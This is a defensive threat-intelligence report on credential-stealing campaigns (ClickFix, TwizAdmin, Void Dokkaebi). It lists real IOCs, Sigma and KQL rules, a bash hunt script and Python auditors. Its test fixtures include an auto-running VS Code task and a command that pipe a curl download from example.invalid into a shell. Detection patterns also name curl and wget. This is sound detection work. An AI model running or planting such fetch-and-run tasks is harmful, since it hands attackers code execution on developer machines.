Threat Summary
Current OTX Pulse data reveals a coordinated surge in credential theft and infostealer operations targeting both enterprise macOS and Windows environments. The landscape is dominated by three distinct but overlapping campaigns:
- ClickFix & Social Engineering: The Lazarus Group ("Mach-O Man") and unknown actors are utilizing "ClickFix" techniques—tricking users into executing terminal commands via fake CAPTCHAs or meeting invites (Zoom/Teams impersonation). This vector is highly effective at bypassing traditional email filters as it often initiates via Telegram or direct messaging.
- Supply Chain & Developer Targeting: The "Void Dokkaebi" group (WageMole) is actively poisoning code repositories and exploiting VS Code configurations to distribute malware (DEV#POPPER RAT, InvisibleFerret) under the guise of fake job interviews.
- Multi-Platform Crypto Theft: The "TwizAdmin" operation represents a sophisticated Malware-as-a-Service (MaaS) bundle combining clipboard hijacking, seed phrase theft, and a ransomware module (crpx0), managed via a FastAPI C2 panel.
The collective objective of these campaigns is financial theft through credential harvesting (browser cookies, keychain), cryptocurrency wallet draining (clipboard hijacking, drainer scripts), and establishing persistent access for future ransomware deployment.
Threat Actor / Malware Profile
TwizAdmin (DataBreachPlus)
- Type: Infostealer, Crypto Clipper, Ransomware (MaaS).
- Distribution: Malicious payloads hosted on domains like fanonlyatn.xyz; likely distributed via phishing lures (FedEx impersonation noted in partial intel).
- Behavior: Multi-stage payload targeting Windows and macOS. Steals browser credentials, BIP-39 seed phrases, and clipboard data for 8+ crypto chains. Deploys crpx0 ransomware.
- C2: FastAPI-based panel; observed on port 1337 at IP 103.241.66[.]238.
Mach-O Man (Lazarus Group)
- Type: macOS Infostealer, RAT.
- Distribution: ClickFix attacks via Telegram. Fake meeting invites leading to cloned collaboration sites.
- Behavior: Uses "PyLangGhostRAT" and Mach-O binaries. Harvests browser data and credentials.
- Persistence: Establishes persistence via LaunchAgents or modified shell profiles.
Void Dokkaebi (WageMole / Famous Chollima)
- Type: Supply Chain Attack, RAT Loader.
- Distribution: Fake job interviews luring developers to clone malicious Git repositories.
- Behavior: Exploits VS Code by injecting malicious tasks into .vscode/tasks. Tampers with Git history to propagate the infection.
- Payloads: BeaverTail (loader), InvisibleFerret (info stealer), DEV#POPPER RAT.
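The following is an added example for the defender side of the Void Dokkaebi vector; it is not the report's or VS Code's own code. It assumes two VS Code facts not stated on this page: tasks are defined in `.vscode/tasks.json`, and a task whose `runOptions.runOn` is `folderOpen` is started when the folder is opened (Workspace Trust gates this only for untrusted folders). The sample tasks file, the hostname `example.invalid` and the list of suspicious command fragments are constructed for the example.

```python
"""Audit a cloned workspace's .vscode/tasks.json for auto-running or remote-fetching tasks.

Added example, not the report's or VS Code's code. Assumptions: tasks live in
.vscode/tasks.json and runOptions.runOn == "folderOpen" means auto-start on open.
"""
import json
import re
from pathlib import Path

# Constructed list of command fragments that fetch, pipe or decode content at task start.
SUSPICIOUS_CMD = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|base64|node\s+-e|python3?\s+-c|\|\s*(ba)?sh\b)", re.I)


def load_jsonc(text: str):
    """tasks.json is JSON-with-comments: strip /* */ blocks, full-line // comments and trailing commas."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def flatten_command(task: dict) -> str:
    """Join command and args (string args or {"value": ...} objects) into one inspectable line."""
    parts = [str(task.get("command", ""))]
    for arg in task.get("args") or []:
        parts.append(arg if isinstance(arg, str) else str(arg.get("value", "")))
    return " ".join(parts)


def audit_tasks(text: str) -> list:
    """Return one finding per task that auto-runs on folder open or runs a suspicious shell command."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        cmd = flatten_command(task)
        reasons = []
        if run_on == "folderOpen":
            reasons.append("runs automatically on folder open")
        if task.get("type") == "shell" and SUSPICIOUS_CMD.search(cmd):
            reasons.append("shell command fetches, pipes or decodes content")
        if reasons:
            findings.append({"label": task.get("label"), "command": cmd, "reasons": reasons})
    return findings


def audit_workspace(root) -> list:
    """Audit <root>/.vscode/tasks.json if present; an absent file yields no findings."""
    path = Path(root) / ".vscode" / "tasks.json"
    return audit_tasks(path.read_text(encoding="utf-8")) if path.is_file() else []


# Constructed tasks.json: one ordinary build task and one auto-running fetch-and-pipe task.
SAMPLE_TASKS_JSON = r"""{
  // build configuration
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "npm", "script": "build" },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl",
      "args": ["-s", "http://example.invalid/setup.sh", "|", "sh"],
      "runOptions": { "runOn": "folderOpen" },
    },
  ]
}"""

if __name__ == "__main__":
    for finding in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] task '{finding['label']}': {'; '.join(finding['reasons'])}")
        print(f"    command: {finding['command']}")
```

Run `audit_workspace(path)` on a freshly cloned repository before opening it in VS Code; the `folderOpen` flag alone is worth a finding even when the command looks benign, because it is the auto-execution primitive the lure depends on.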
StepDrainer
- Type: Crypto Drainer MaaS.
- Behavior: Smart contract abuse targeting ERC-20 tokens and NFTs. Uses phishing sites like moonscan.live to trick users into signing malicious transactions.
IOC Analysis
The provided IOCs indicate a hybrid infrastructure utilizing both commodity hosting and specific C2 frameworks.
- Domains & URLs: A large number of phishing and C2 domains were identified, for example livemicrosft.com (Lazarus, typosquatting), bull-run.fun, fanonlyatn.xyz (TwizAdmin), and moonscan.live (StepDrainer). SOCs should match DNS query logs against these indicators to identify victims or in-progress C2 beaconing.
- IP Addresses: Multiple IPs used for Command & Control (C2) or payload hosting, such as 31.31.198.206, 166.88.4.2 and 172.94.9.250. These IPs should be blocked directly at the firewall.
- File Hashes: A large number of SHA256 and MD5 hashes covering Mach-O binaries, Windows executables and Python scripts.
- Decoding: Use the file command to identify the binary type, and use VirusTotal or a local sandbox to analyze static properties and behavior. For macOS hashes, check whether the binary is ad-hoc signed or carries an invalid Developer ID.
- Operationalization: Import the indicators into a SIEM (e.g., Splunk, Sentinel) to correlate DNS requests and process creation. Deploy the hash values to the EDR block list.
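As an added example of the DNS and network matching described above (not the report's tooling), the script below runs the report's domain and IP indicators over constructed log lines. The log line format, hostnames and timestamps are constructed; the indicator values are the ones quoted in this report. It matches domains on a label boundary, so a subdomain of an IOC domain hits while a lookalike that merely ends in the same characters does not, and it normalizes the defanged `[.]` form used in the report.

```python
"""IOC hunt over constructed DNS-query and firewall log lines.

Added example, not part of the Security Arsenal report. Log format, hostnames
and timestamps are constructed; the indicator values come from the report.
"""
import re

# Indicators quoted in the report (a defanged [.] form is normalised below).
IOC_DOMAINS = {"fanonlyatn.xyz", "livemicrosft.com", "bull-run.fun", "moonscan.live"}
IOC_IPS = {"31.31.198.206", "166.88.4.2", "172.94.9.250", "103.241.66[.]238"}


def refang(indicator: str) -> str:
    """Normalise an indicator or log value: undo [.] defanging, lower-case, drop a trailing dot."""
    return indicator.replace("[.]", ".").strip().lower().rstrip(".")


def domain_matches(qname: str, iocs: set) -> bool:
    """True when qname is an IOC domain or a subdomain of one.

    The suffix check is anchored on a label boundary, so 'notfanonlyatn.xyz'
    does not match 'fanonlyatn.xyz' while 'cdn.fanonlyatn.xyz' does.
    """
    q = refang(qname)
    return any(q == d or q.endswith("." + d) for d in map(refang, iocs))


# Constructed sample telemetry; not real traffic.
SAMPLE_DNS = [
    "2026-04-23T10:01:12Z host=mac-dev-07 query=cdn.fanonlyatn.xyz type=A",
    "2026-04-23T10:01:15Z host=mac-dev-07 query=www.apple.com type=A",
    "2026-04-23T10:02:40Z host=win-eng-03 query=LIVEMICROSFT.COM. type=A",
    "2026-04-23T10:03:01Z host=win-eng-03 query=notfanonlyatn.xyz type=A",
]
SAMPLE_FW = [
    "2026-04-23T10:02:41Z host=win-eng-03 dst=103.241.66.238 dport=1337 proto=tcp",
    "2026-04-23T10:02:50Z host=win-eng-03 dst=8.8.8.8 dport=53 proto=udp",
    "2026-04-23T10:04:10Z host=mac-dev-07 dst=172.94.9.250 dport=443 proto=tcp",
]

DNS_RE = re.compile(r"host=(\S+)\s+query=(\S+)")
FW_RE = re.compile(r"host=(\S+)\s+dst=(\S+)\s+dport=(\d+)")


def hunt_dns(lines):
    """Return (host, queried_name) pairs whose query hits the domain IOC list."""
    hits = []
    for line in lines:
        m = DNS_RE.search(line)
        if m and domain_matches(m.group(2), IOC_DOMAINS):
            hits.append((m.group(1), refang(m.group(2))))
    return hits


def hunt_firewall(lines):
    """Return (host, dst_ip, dport) triples for connections to IOC IPs.

    Any destination port counts: the report notes 1337 for the TwizAdmin
    panel, but the IP itself is the indicator.
    """
    bad_ips = {refang(ip) for ip in IOC_IPS}
    hits = []
    for line in lines:
        m = FW_RE.search(line)
        if m and m.group(2) in bad_ips:
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits


if __name__ == "__main__":
    for host, name in hunt_dns(SAMPLE_DNS):
        print(f"[!] {host} resolved IOC domain {name}")
    for host, ip, port in hunt_firewall(SAMPLE_FW):
        print(f"[!] {host} connected to IOC {ip}:{port}")
```

Swap the two regexes for whatever field layout your resolver or firewall emits; the normalisation and label-boundary matching are the parts worth keeping, since an exact-match lookup on the raw query name misses both subdomains and upper-case or trailing-dot variants.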
Detection Engineering
Sigma Rules
```yaml
title: Potential macOS ClickFix Terminal Execution
id: 8f7e9a1b-2c3d-4f5e-8b9a-1c2d3e4f5a6b
date: 2026/04/23
status: experimental
description: Detects suspicious terminal execution often used in ClickFix campaigns where users are tricked into running a command string.
references:
  - https://otx.alienvault.com/pulse/6264d5a8-1c2e-1234-5678-1234567890ab
author: Security Arsenal
logsource:
  category: process_creation
  product: macos
detection:
  # The three field lists below are ANDed: shell or osascript, spawned by a terminal app,
  # with a download/install fragment on the command line.
  selection:
    Image|endswith:
      - '/bin/sh'
      - '/bin/bash'
      - '/bin/zsh'
      - '/usr/bin/osascript'
    ParentImage|endswith:
      - '/Terminal.app/Contents/MacOS/Terminal'
      - '/iTerm.app/Contents/MacOS/iTerm2'
    CommandLine|contains:
      - 'curl'
      - 'wget'
      - 'python3 -c'
      - 'pip install'
  condition: selection
falsepositives:
  - Legitimate developer administration
level: high
tags:
  - attack.execution
  - attack.t1059.004
  - os.macos
  - clickfix
---
title: VS Code Exploitation via Malicious Tasks
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
date: 2026/04/23
status: experimental
description: Detects execution of suspicious commands via VS Code terminal or tasks, indicative of Void Dokkaebi supply chain attack.
references:
  - https://otx.alienvault.com/pulse/6264d5a8-1c2e-1234-5678-1234567890ac
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\\Code.exe'
      - '\\code-insiders.exe'
      - '\\node.exe'
      - '\\cmd.exe'
      - '\\powershell.exe'
  selection_cli:
    CommandLine|contains:
      - '.vscode/tasks.'
      - 'npm run'
      - 'npm install'
      - 'node index.js'
      - 'extension.js'
  condition: all of selection_*
falsepositives:
  - Legitimate developer workflow
level: medium
tags:
  - attack.initial_access
  - attack.t1195.002
  - supply.chain
  - void.dokkaebi
---
title: TwizAdmin C2 Network Activity
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
date: 2026/04/23
status: experimental
description: Detects network connections to known TwizAdmin C2 infrastructure or domains associated with the operation.
references:
  - https://otx.alienvault.com/pulse/6264d5a8-1c2e-1234-5678-1234567890ad
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection_ip:
    DestinationIp|startswith:
      - '31.31.198.'
      - '103.241.66.'
  selection_domain:
    DestinationHostname|contains:
      - 'fanonlyatn.xyz'
  selection_port:
    DestinationPort: 1337
  # selection_port on its own matches any outbound connection to 1337; restrict the
  # condition to the IP/domain selections if that proves noisy in your environment.
  condition: 1 of selection_*
falsepositives:
  - Rare
level: critical
tags:
  - attack.command_and_control
  - attack.t1071.001
  - c2
  - twizadmin
```
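To show how the three rules above actually combine their selections, here is an added example (not the report's tooling and not a Sigma backend): a minimal matcher for the `endswith`, `contains` and `startswith` modifiers and the `selection`, `all of selection_*` and `1 of selection_*` conditions, run over constructed events. The selections are transcribed from the rules; the event values and the hostname `example.invalid` are constructed.

```python
"""Evaluate the report's Sigma selections against constructed process and network events.

Added example, not the report's code: a minimal Sigma-style matcher covering only
the modifiers and condition forms the three rules above use. Events are constructed.
"""


def _field_matches(value, modifier, patterns):
    """Sigma semantics: a list under one field is OR-ed; comparison is case-insensitive."""
    if value is None:
        return False
    v = str(value).lower()
    if not isinstance(patterns, list):
        patterns = [patterns]
    for pattern in patterns:
        p = str(pattern).lower()
        if modifier == "endswith" and v.endswith(p):
            return True
        if modifier == "contains" and p in v:
            return True
        if modifier == "startswith" and v.startswith(p):
            return True
        if modifier == "" and v == p:
            return True
    return False


def selection_matches(event, selection):
    """Every field inside one selection map must match (AND), e.g. Image AND ParentImage AND CommandLine."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if not _field_matches(event.get(field), modifier, patterns):
            return False
    return True


# Selections transcribed from the three rules above.
CLICKFIX_MACOS = {
    "Image|endswith": ["/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript"],
    "ParentImage|endswith": ["/Terminal.app/Contents/MacOS/Terminal",
                             "/iTerm.app/Contents/MacOS/iTerm2"],
    "CommandLine|contains": ["curl", "wget", "python3 -c", "pip install"],
}
VSCODE_SELECTIONS = {
    "selection_img": {"Image|endswith": ["\\Code.exe", "\\code-insiders.exe", "\\node.exe",
                                         "\\cmd.exe", "\\powershell.exe"]},
    "selection_cli": {"CommandLine|contains": [".vscode/tasks.", "npm run", "npm install",
                                               "node index.js", "extension.js"]},
}
TWIZADMIN_SELECTIONS = {
    "selection_ip": {"DestinationIp|startswith": ["31.31.198.", "103.241.66."]},
    "selection_domain": {"DestinationHostname|contains": ["fanonlyatn.xyz"]},
    "selection_port": {"DestinationPort": 1337},
}


def clickfix_fires(event):   # condition: selection
    return selection_matches(event, CLICKFIX_MACOS)


def vscode_fires(event):     # condition: all of selection_*
    return all(selection_matches(event, s) for s in VSCODE_SELECTIONS.values())


def twizadmin_fires(event):  # condition: 1 of selection_*
    return any(selection_matches(event, s) for s in TWIZADMIN_SELECTIONS.values())


# Constructed events; field names follow the Sigma process_creation / network_connection taxonomy.
CLICKFIX_HIT = {"Image": "/bin/zsh",
                "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
                "CommandLine": "curl -fsSL http://example.invalid/fix.sh | sh"}
# Same command line, but spawned from an editor's integrated terminal rather than Terminal.app.
CLICKFIX_MISS = dict(CLICKFIX_HIT, ParentImage="/Applications/Visual Studio Code.app/Contents/MacOS/Electron")
VSCODE_HIT = {"Image": "C:\\Program Files\\nodejs\\node.exe", "CommandLine": "node index.js"}
VSCODE_MISS = {"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c dir"}
TWIZ_PORT_ONLY = {"DestinationIp": "198.51.100.7", "DestinationHostname": "", "DestinationPort": 1337}

if __name__ == "__main__":
    for name, fired in [("ClickFix hit", clickfix_fires(CLICKFIX_HIT)),
                        ("ClickFix from editor terminal", clickfix_fires(CLICKFIX_MISS)),
                        ("VS Code node index.js", vscode_fires(VSCODE_HIT)),
                        ("TwizAdmin port 1337 only", twizadmin_fires(TWIZ_PORT_ONLY))]:
        print(f"{name}: {'ALERT' if fired else 'no match'}")
```

Two of the constructed events are there to surface tuning points: `CLICKFIX_MISS` shows that the first rule's `ParentImage` list means a paste into an editor's integrated terminal does not fire, and `TWIZ_PORT_ONLY` shows that `1 of selection_*` in the third rule fires on any connection to port 1337 regardless of destination.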
KQL (Microsoft Sentinel)
```kql
// Hunt for ClickFix and Malware Domains
let IOC_Domains = dynamic(["fanonlyatn.xyz", "livemicrosft.com", "bull-run.fun", "spot-wave.fun", "moonscan.live", "scanclaw.live"]);
let IOC_IPs = dynamic(["31.31.198.206", "166.88.4.2", "85.239.62.36", "23.27.20.143", "172.94.9.250"]);
// Network Events
// Note: in~ is an exact (case-insensitive) match, so subdomains of an IOC domain are not caught;
// use `RemoteUrl has_any (IOC_Domains)` if you also want those.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ (IOC_Domains) or RemoteIP in~ (IOC_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| union (
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    // Look for suspicious script execution patterns associated with ClickFix
    | where ProcessCommandLine has_any ("curl", "wget", "powershell -c", "python3 -c")
        and (ProcessCommandLine has "http" or ProcessCommandLine has "pastebin" or ProcessCommandLine has "127.0.0.1")
)
| summarize count() by DeviceName, bin(Timestamp, 1h)
| order by count_ desc
```
Hunt Script (Bash)
```bash
#!/bin/bash
# IOC Hunt Script for macOS/Linux endpoints
# Checks for network connections to malicious IPs and suspicious file hashes
echo "[*] Starting Hunt for TwizAdmin/Mach-O Man Indicators..."

# Malicious IPs from Pulses
MAL_IPS=("31.31.198.206" "166.88.4.2" "172.94.9.250" "103.241.66.238")

# Check Established Connections (netstat is present on macOS; on Linux hosts without it, use `ss -tan`)
for ip in "${MAL_IPS[@]}"; do
    CONNS=$(netstat -an 2>/dev/null | grep ESTABLISHED | grep "$ip")
    if [ -n "$CONNS" ]; then
        echo "[!] ALERT: Established connection found to $ip"
        echo "$CONNS"
    fi
done

# Check for Suspicious Domains in Hosts or Resolutions (Simulated)
MAL_DOMAINS=("fanonlyatn.xyz" "livemicrosft.com" "bull-run.fun")
for domain in "${MAL_DOMAINS[@]}"; do
    # grep /etc/hosts just in case of static poisoning
    if grep -q "$domain" /etc/hosts; then
        echo "[!] ALERT: $domain found in /etc/hosts"
    fi
done

# Check for known malware file paths (if specific paths were known, else generic temp dirs)
# Here: shell profiles in user home directories that pipe a curl download into a shell,
# the persistence mechanism noted in the Mach-O Man profile.
echo "[*] Scanning user shell profiles for curl-to-shell persistence..."
USER_DIRS=/Users
find "$USER_DIRS" -maxdepth 2 -type f \( -name ".zshrc" -o -name ".bash_profile" \) \
    -exec grep -l "curl.*sh" {} \; 2>/dev/null
echo "[*] Hunt Complete."
```
Response Priorities
- Immediate (0-24h):
  - Block IOCs: Immediately block all listed IPs and domains at the firewall and proxy level.
  - Hunt Compromise: Scan endpoints for the specified file hashes (SHA256/MD5), specifically looking for osascript anomalies and VS Code task modifications (tasks.).
  - Isolate Infected: If connections to 103.241.66[.]238:1337 (TwizAdmin C2) or 172.94.9.250 are detected, isolate the host immediately, as active infostealing is likely occurring.
- 24-48h:
  - Credential Reset: For users who may have interacted with "ClickFix" prompts or fake meeting invites (Lazarus campaign), force a password reset and rotate session tokens/cookies.
  - Developer Audit: Interview developers who recently cloned repositories from external sources. Review Git history for the Void Dokkaebi indicators.
- 1 Week:
  - Application Control: Implement stricter policies allowing only signed binaries on macOS (Gatekeeper hardening) to prevent unsigned Mach-O malware execution.
  - Supply Chain Policy: Enforce requirements that all code repositories must be scanned before cloning, and disable VS Code tasks execution for untrusted workspaces.